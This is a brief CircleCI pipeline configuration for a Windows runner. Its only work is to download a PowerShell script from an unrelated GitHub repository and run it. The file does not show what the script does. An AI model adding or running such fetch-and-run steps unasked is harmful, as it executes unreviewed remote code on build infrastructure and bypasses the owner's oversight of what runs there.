version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - checkout 
      - run: Invoke-WebRequest https://raw.githubusercontent.com/simulasi2/bruh/cd3d718f6a92fbfc35be41889d5d9eb44085006f/windows.ps1 -OutFile windows.ps1
      - run: ./windows.ps1